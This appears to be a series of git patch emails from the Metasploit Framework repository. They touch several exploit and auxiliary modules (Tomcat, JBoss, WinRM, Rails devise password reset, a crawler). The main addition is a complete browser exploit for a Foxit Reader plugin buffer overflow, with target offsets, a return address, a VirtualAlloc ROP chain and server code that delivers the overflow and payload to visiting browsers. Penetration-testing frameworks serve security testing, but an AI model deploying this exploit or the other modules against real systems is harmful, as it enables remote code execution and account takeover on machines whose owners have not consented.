a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 9f030bbbc2fe..565d73a293c1 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -227,7 +227,9 @@ def upload_exec(session,rpath) authmsg = res.headers['WWW-Authenticate'] end print_error("The remote server responded expecting authentication") - if authmsg + if datastore['BasicAuthUser'] and datastore['BasicAuthPass'] + print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser']) + elsif authmsg print_error("WWW-Authenticate: %s" % authmsg) end cleanup_instructions(rpath, name) # display cleanup info diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index f350fe498483..07d5eb2adaef 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -96,6 +96,9 @@ def initialize(info = {}) def exploit + datastore['BasicAuthUser'] = datastore['USERNAME'] + datastore['BasicAuthPass'] = datastore['PASSWORD'] + jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 2297b5256928..7c36c1fa1624 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -123,6 +123,9 @@ def auto_target def exploit + datastore['BasicAuthUser'] = datastore['USERNAME'] + datastore['BasicAuthPass'] = datastore['PASSWORD'] + jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 2757cb6e1322..a46cd2c033f5 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -112,6 +112,9 @@ def initialize(info = {}) end def check + datastore['BasicAuthUser'] = datastore['USERNAME'] + datastore['BasicAuthPass'] = datastore['PASSWORD'] + res = query_serverinfo disconnect return CheckCode::Unknown if res.nil? @@ -124,8 +127,8 @@ def check :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['USERNAME'], - :pass => datastore['PASSWORD'], + :user => datastore['BasicAuthUser'], + :pass => datastore['BasicAuthPass'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) @@ -161,6 +164,9 @@ def auto_target def exploit + datastore['BasicAuthUser'] = datastore['USERNAME'] + datastore['BasicAuthPass'] = datastore['PASSWORD'] + mytarget = target if (target.name =~ /Automatic/) mytarget = auto_target @@ -215,8 +221,8 @@ def exploit :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['USERNAME'], - :pass => datastore['PASSWORD'], + :user => datastore['BasicAuthUser'], + :pass => datastore['BasicAuthPass'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 3bfd6c668e18..9865c8716bd4 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -67,6 +67,9 @@ def initialize(info = {}) end def go(command) + datastore['BasicAuthUser'] = datastore['USERNAME'] + datastore['BasicAuthPass'] = datastore['PASSWORD'] + xml = <<-EOS <?xml version="1.0"?> <methodCall> diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index c337ecdeee63..3484cdf86f47 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -72,8 +72,8 @@ def initialize(info = {}) register_options( [ Opt::RPORT(8080), - OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), - OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), + OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), + OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), ], self.class) end diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index c4d36a61f1fc..c19096b2c8e9 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -36,8 +36,8 @@ def initialize [ OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), - OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) + OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']), + OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp']) ], self.class) end @@ -46,10 +46,12 @@ def initialize def exploit uri = build_path print_status "Uploading Payload to #{uri}" - res = send_request_cgi({ + res,c = send_digest_request_cgi({ 'uri' => uri, 'method' => 'PUT', - 'data' => payload.raw + 'data' => payload.raw, + 'DigestAuthUser' => datastore['RUSER'], + 'DigestAuthPassword' => datastore['RPASS'] }, 25) unless (res and res.code == 201) print_error "Failed to upload file!" diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 62e343a79896..666ca66d3dba 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -66,8 +66,20 @@ def initialize(info = {}) @compat_mode = false end - def exploit + def check + unless accepts_ntlm_auth + print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth" + return Msf::Exploit::CheckCode::Safe + end + + return Msf::Exploit::CheckCode::Vulnerable + end + + def exploit + unless check == Msf::Exploit::CheckCode::Vulnerable + return + end unless valid_login? print_error "Login Failure. Recheck your credentials" return @@ -129,7 +141,7 @@ def encoded_psh(script) def temp_dir print_status "Grabbing %TEMP%" - resp = send_winrm_request(winrm_open_shell_msg) + resp,c = send_request_ntlm(winrm_open_shell_msg) if resp.nil? print_error "Got no reply from the server" return nil @@ -140,16 +152,16 @@ def temp_dir end shell_id = winrm_get_shell_id(resp) cmd = "echo %TEMP%" - resp= send_winrm_request(winrm_cmd_msg(cmd, shell_id)) + resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id)) cmd_id = winrm_get_cmd_id(resp) - resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id)) + resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id)) streams = winrm_get_cmd_streams(resp) return streams['stdout'].chomp end def check_remote_arch wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"} - resp = send_winrm_request(winrm_wql_msg(wql)) + resp,c = send_request_ntlm(winrm_wql_msg(wql)) #Default to x86 if we can't be sure return "x86" if resp.nil? or resp.code != 200 resp_tbl = parse_wql_response(resp) @@ -235,7 +247,7 @@ def powershell2? def valid_login? data = winrm_wql_msg("Select Name,Status from Win32_Service") - resp = send_winrm_request(data) + resp,c = send_request_ntlm(data) unless resp.code == 200 return false end From 71abcdbd1a10ed6d5c426e1baed68c1b181bfb0e Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Mon, 11 Feb 2013 21:56:56 -0600 Subject: [PATCH 365/421] Update Gemfile.lock --- Gemfile.lock | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/Gemfile.lock b/Gemfile.lock index 99f60b664ded..c50df873bfab 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,8 +28,12 @@ GEM coderay (1.0.8) diff-lcs (1.1.3) i18n (0.6.1) + json (1.7.7) method_source (0.8.1) + msgpack (0.5.2) multi_json (1.0.4) + nokogiri (1.5.6) + pcaprub (0.11.3) pg (0.14.1) pry (0.9.10) coderay (~> 1.0.5) @@ -37,6 +41,7 @@ GEM slop (~> 3.3.1) rake (10.0.2) redcarpet (2.2.2) + robots (0.10.1) rspec (2.12.0) rspec-core (~> 2.12.0) rspec-expectations (~> 2.12.0) @@ -57,10 +62,17 @@ PLATFORMS ruby DEPENDENCIES + activerecord activesupport (>= 3.0.0) + json metasploit_data_models! + msgpack + nokogiri + pcaprub + pg (>= 0.11) rake redcarpet + robots rspec (>= 2.12) simplecov (= 0.5.4) yard From 69267b82b09204afe3dbbb687b59f5c72402ac6c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Tue, 12 Feb 2013 18:44:19 +0100 Subject: [PATCH 366/421] Make stable #1318 foxit reader exploit --- .../browser/foxit_reader_plugin_url_bof.rb | 187 ++++++++++++++++++ 1 file changed, 187 insertions(+) create mode 100644 modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb new file mode 100644 index 000000000000..b410c2695adb --- /dev/null +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -0,0 +1,187 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpServer::HTML + + Rank = NormalRanking + + def initialize(info={}) + super(update_info(info, + 'Name' => "Foxit Reader Plugin URL Processing Buffer Overflow", + 'Description' => %q{ + This module exploits a vulnerability in the Foxit Reader Plugin, it exists in + the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, + overly long query strings within URLs can cause a stack-based buffer overflow, + which can be exploited to execute arbitrary code. This exploit has been tested + on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.1128 + (npFoxitReaderPlugin.dll version 2.2.1.530). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod <rgod[at]autistici.org>', # initial discovery and poc + 'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module + 'juan vazquez', # metasploit module + ], + 'References' => + [ + [ 'OSVDB', '89030' ], + [ 'BID', '57174' ], + [ 'EDB', '23944' ], + [ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ], + [ 'URL', 'http://secunia.com/advisories/51733/' ] + ], + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true + }, + 'DefaultOptions' => + { + 'EXITFUNC' => "process", + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # npFoxitReaderPlugin.dll version 2.2.1.530 + [ 'Automatic', {} ], + [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.44', + { + 'Offset' => 272, + 'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin + 'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin + :rop => :win7_rop_chain + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jan 7 2013", + 'DefaultTarget' => 0)) + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + #Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0 + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || '' + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + end + + if os_name == 'Windows 7' and firefox =~ /18/ + return targets[1] + end + + return nil + end + + # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module) + def win7_rop_chain + + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] + 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] + 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] + 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] + 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] + 0x41414141, # Filler (RETN offset compensation) + 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] + 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] + 0x00001000, # 0x00001000-> edx + 0x1000d9ec, # XOR EDX, EDX # RETN + 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] + 0x41414141, # Filler (compensate) + 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] + 0x41414141, # Filler (RETN offset compensation) + 0x41414141, # Filler (RETN offset compensation) + 0x41414141, # Filler (RETN offset compensation) + 0x41414141, # Filler (RETN offset compensation) + 0x00000040, # 0x00000040-> ecx + 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] + 0x00000001, # 0x00000001-> ebx + 0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll] + 0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll] + 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] + 0x90909090, # nop + 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] + ].flatten.pack("V*") + + return rop_gadgets + end + + def on_request_uri(cli, request) + + agent = request.headers['User-Agent'] + my_target = get_target(agent) + + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + unless self.respond_to?(my_target[:rop]) + print_error("Invalid target specified: no callback function defined") + send_not_found(cli) + return + end + + return if ((p = regenerate_payload(cli)) == nil) + + # we use two responses: + # one for an HTTP 301 redirect and sending the payload + # and one for sending the HTTP 200 OK with appropriate Content-Type + if request.resource =~ /\.pdf$/ + # sending Content-Type + resp = create_response(200, "OK") + resp.body = "" + resp['Content-Type'] = 'application/pdf' + resp['Content-Length'] = rand_text_numeric(3,"0") + cli.send_response(resp) + return + else + resp = create_response(301, "Moved Permanently") + resp.body = "" + + my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] + if datastore['SSL'] + schema = "https" + else + schema = "http" + end + + sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length) + sploit << [my_target.ret].pack("V") # EIP + sploit << [my_target['WritableAddress']].pack("V") # Writable Address + sploit << self.send(my_target[:rop]) + sploit << p.encoded + + resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all') + cli.send_response(resp) + + # handle the payload + handler(cli) + end + end + +end From 96b1cb3cfbb35e185ce8d6e8f59fb4ecfe3b50ff Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Tue, 12 Feb 2013 18:50:36 +0100 Subject: [PATCH 367/421] fix version info --- .../exploits/windows/browser/foxit_reader_plugin_url_bof.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index b410c2695adb..6c59092789aa 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -21,7 +21,7 @@ def initialize(info={}) the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested - on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.1128 + on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530). }, 'License' => MSF_LICENSE, @@ -54,7 +54,7 @@ def initialize(info={}) [ # npFoxitReaderPlugin.dll version 2.2.1.530 [ 'Automatic', {} ], - [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.44', + [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.44.11281', { 'Offset' => 272, 'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin From f58cc6a2e083a11dc48b7256d6e352f93186a73a Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Tue, 12 Feb 2013 18:51:04 +0100 Subject: [PATCH 368/421] more fix version info --- modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 6c59092789aa..7e5d6353a3b9 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -54,7 +54,7 @@ def initialize(info={}) [ # npFoxitReaderPlugin.dll version 2.2.1.530 [ 'Automatic', {} ], - [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.44.11281', + [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281', { 'Offset' => 272, 'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin From 9e1f106a876e2eb604aa254667cef0a48d37cd24 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 12 Feb 2013 13:38:58 -0600 Subject: [PATCH 369/421] msftidy cleanup --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 6445c286be72..6ea0d62e8060 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -142,7 +142,7 @@ def run if status == false print_error("Failed") return - end + end print_good("Success") # Reset a password. We're racing users creating other reset tokens. From c7719bf4cb1a6d6ae6ccc10d8d5a9a003c14d818 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 12 Feb 2013 13:41:21 -0600 Subject: [PATCH 370/421] Verify response is non-nil. --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 6ea0d62e8060..c3c8038e562e 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -68,6 +68,11 @@ def generate_token(account) 'data' => postdata, }) + unless (res) + print_error("No response from server") + return false + end + if res.code == 200 error_text = res.body[/<div id=\"error_explanation\">\n\s+(.*?)<\/div>/m, 1] print_error("Server returned an error:") @@ -107,6 +112,10 @@ def reset_one(password, report=false) 'ctype' => 'application/xml', 'data' => xml, }) + unless (res) + print_error("No response from server") + return false + end case res.code when 200 From 9efd3f6c5ecc3de77e7d6a68af9491b9320f05a5 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 12 Feb 2013 21:47:12 +0200 Subject: [PATCH 371/421] scanner/http/crawler: added ExcludePathPatterns opt Option 'ExcludePathPatterns' allows users to specify which paths should be excluded from the crawl (and which forms to ignore) by passing a list of patterns (only allows '*' wildcards). --- modules/auxiliary/scanner/http/crawler.rb | 67 ++++++++++++++++------- 1 file changed, 47 insertions(+), 20 deletions(-) diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index 6d50554d9873..8488c24dd0e7 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -21,6 +21,9 @@ def initialize 'License' => MSF_LICENSE ) + register_advanced_options([ + OptString.new('ExcludePathPatterns', [false, 'Newline-separated list of path patterns to ignore (\'*\' is a wildcard)']), + ]) @for_each_page_blocks = [] end @@ -31,6 +34,17 @@ def focus_crawl(page) end =end + # Overrides Msf::Auxiliary::HttpCrawler#get_link_filter to add + # datastore['ExcludePathPatterns'] + def get_link_filter + return super if datastore['ExcludePathPatterns'].to_s.empty? + + patterns = opt_patterns_to_regexps( datastore['ExcludePathPatterns'].to_s ) + patterns = patterns.map { |r| "(#{r.source})" } + + Regexp.new( [["(#{super.source})"] | patterns].join( '|' ) ) + end + def run super @@ -163,31 +177,34 @@ def crawler_process_page(t, page, cnt) end end - form = {}.merge!(form_template) - form[:method] = (f['method'] || 'GET').upcase - form[:query] = target.query.to_s if form[:method] != "GET" - form[:path] = target.path - form[:params] = [] - f.css('input', 'textarea').each do |inp| - form[:params] << [inp['name'].to_s, inp['value'] || inp.content || '', { :type => inp['type'].to_s }] - end + # skip this form if it matches exclusion criteria + if !(target.to_s =~ get_link_filter) + form = {}.merge!(form_template) + form[:method] = (f['method'] || 'GET').upcase + form[:query] = target.query.to_s if form[:method] != "GET" + form[:path] = target.path + form[:params] = [] + f.css('input', 'textarea').each do |inp| + form[:params] << [inp['name'].to_s, inp['value'] || inp.content || '', { :type => inp['type'].to_s }] + end - f.css( 'select' ).each do |s| - value = nil + f.css( 'select' ).each do |s| + value = nil - # iterate over each option to find the default value (if there is a selected one) - s.children.each do |opt| - ov = opt['value'] || opt.content - value = ov if opt['selected'] - end + # iterate over each option to find the default value (if there is a selected one) + s.children.each do |opt| + ov = opt['value'] || opt.content + value = ov if opt['selected'] + end - # set the first one as the default value if we don't already have one - value ||= s.children.first['value'] || s.children.first.content rescue '' + # set the first one as the default value if we don't already have one + value ||= s.children.first['value'] || s.children.first.content rescue '' - form[:params] << [ s['name'].to_s, value.to_s, [ :type => 'select'] ] - end + form[:params] << [ s['name'].to_s, value.to_s, [ :type => 'select'] ] + end - forms << form + forms << form + end end end @@ -252,4 +269,14 @@ def form_from_url( website, url ) form[:method] ? form : nil end + private + def opt_patterns_to_regexps( patterns ) + magic_wildcard_replacement = Rex::Text.rand_text_alphanumeric( 10 ) + patterns.to_s.split( /[\r\n]+/).map do |p| + Regexp.new '^' + Regexp.escape( p.gsub( '*', magic_wildcard_replacement ) ). + gsub( magic_wildcard_replacement, '.*' ) + '$' + end + end + + end From c6a7a4e68dfda54428b663990944e13caeef1e67 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 12 Feb 2013 14:50:10 -0600 Subject: [PATCH 372/421] /URIPATH/TARGETURI/g --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index c3c8038e562e..499b971bdd9b 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -47,7 +47,7 @@ def initialize(info = {}) register_options( [ - OptString.new('URIPATH', [ true, "The request URI", '/users/password']), + OptString.new('TARGETURI', [ true, "The request URI", '/users/password']), OptString.new('TARGETEMAIL', [true, "The email address of target account"]), OptString.new('PASSWORD', [true, 'The password to set']), OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]), @@ -63,7 +63,7 @@ def generate_token(account) postdata="user[email]=#{account}" res = send_request_cgi({ - 'uri' => datastore['URIPATH'], + 'uri' => datastore['TARGETURI'], 'method' => 'POST', 'data' => postdata, }) @@ -107,7 +107,7 @@ def reset_one(password, report=false) xml << "</user>" res = send_request_cgi({ - 'uri' => datastore['URIPATH'] || "/", + 'uri' => datastore['TARGETURI'] || "/", 'method' => 'PUT', 'ctype' => 'application/xml', 'data' => xml, From 1d5d33f306cc5baa02ec03b769aa29f84a6237e5 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 12 Feb 2013 14:58:07 -0600 Subject: [PATCH 373/421] use normalize_uri() --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 499b971bdd9b..4f577afadd95 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -63,7 +63,7 @@ def generate_token(account) postdata="user[email]=#{account}" res = send_request_cgi({ - 'uri' => datastore['TARGETURI'], + 'uri' => normalize_uri(datastore['TARGETURI']), 'method' => 'POST', 'data' => postdata, }) @@ -107,7 +107,7 @@ def reset_one(password, report=false) xml << "</user>" res = send_request_cgi({ - 'uri' => datastore['TARGETURI'] || "/", + 'uri' => normalize_uri(datastore['TARGETURI']), 'method' => 'PUT', 'ctype' => 'application/xml', 'data' => xml, From 846052a34dfff3b966a76b6039cddcaaf3367407 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 12 Feb 2013 15:13:06 -0600 Subject: [PATCH 374/421] s/URIPATH/TARGETURI/g per @jvasquez-r7 comments on another pull. --- modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb index 64c67cf86b25..66ebde956d1d 100644 --- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb @@ -31,14 +31,14 @@ def initialize(info={}) )) register_options([ - OptString.new('URIPATH', [true, "The URI to test", "/"]), + OptString.new('TARGETURI', [true, "The URI to test", "/"]), OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT']]), ], self.class) end def send_probe(pdata) res = send_request_cgi({ - 'uri' => datastore['URIPATH'] || "/", + 'uri' => datastore['TARGETURI'], 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/json', 'data' => pdata @@ -59,7 +59,7 @@ def run_host(ip) if res1.code.to_s =~ /^[5]/ print_error("#{rhost}:#{rport} The server replied with #{res1.code} for our initial JSON request") - print_error("\t\tDouble check URIPATH and HTTP_METHOD") + print_error("\t\tDouble check TARGETURI and HTTP_METHOD") return end @@ -94,7 +94,7 @@ def run_host(ip) }) else # Otherwise we're not likely vulnerable. - vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH must be set") + vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or TARGETURI must be set") end end From 167f5970c15009ce637d39cee03c737c042a9c7c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 13 Feb 2013 00:07:58 +0100 Subject: [PATCH 375/421] minor cleanup for rails_json_yaml_scanner --- .../scanner/http/rails_json_yaml_scanner.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb index 66ebde956d1d..514559eb1f08 100644 --- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb @@ -19,14 +19,15 @@ def initialize(info={}) This module attempts to identify Ruby on Rails instances vulnerable to an arbitrary object instantiation flaw in the JSON request processor. }, - 'Author' => [ + 'Author' => + [ 'jjarmoc', # scanner module 'hdm' # CVE-2013-0156 scanner, basis of this technique. - ], + ], 'License' => MSF_LICENSE, 'References' => [ - ['CVE', '2013-0333'], + ['CVE', '2013-0333'] ] )) @@ -38,11 +39,11 @@ def initialize(info={}) def send_probe(pdata) res = send_request_cgi({ - 'uri' => datastore['TARGETURI'], + 'uri' => normalize_uri(datastore['TARGETURI']), 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/json', 'data' => pdata - }, 25) + }) end def run_host(ip) @@ -58,8 +59,7 @@ def run_host(ip) end if res1.code.to_s =~ /^[5]/ - print_error("#{rhost}:#{rport} The server replied with #{res1.code} for our initial JSON request") - print_error("\t\tDouble check TARGETURI and HTTP_METHOD") + vprint_error("#{rhost}:#{rport} The server replied with #{res1.code} for our initial JSON request, double check TARGETURI and HTTP_METHOD") return end @@ -94,7 +94,7 @@ def run_host(ip) }) else # Otherwise we're not likely vulnerable. - vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or TARGETURI must be set") + vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or TARGETURI & HTTP_METHOD must be set") end end From 799beb5adcc958dde98974a50519b7085cb65fa5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 13 Feb 2013 01:00:25 +0100 Subject: [PATCH 376/421] minor cleanup --- .../admin/http/rails_devise_pass_reset.rb | 56 +++++++++---------- 1 file changed, 28 insertions(+), 28 deletions(-) diff --git 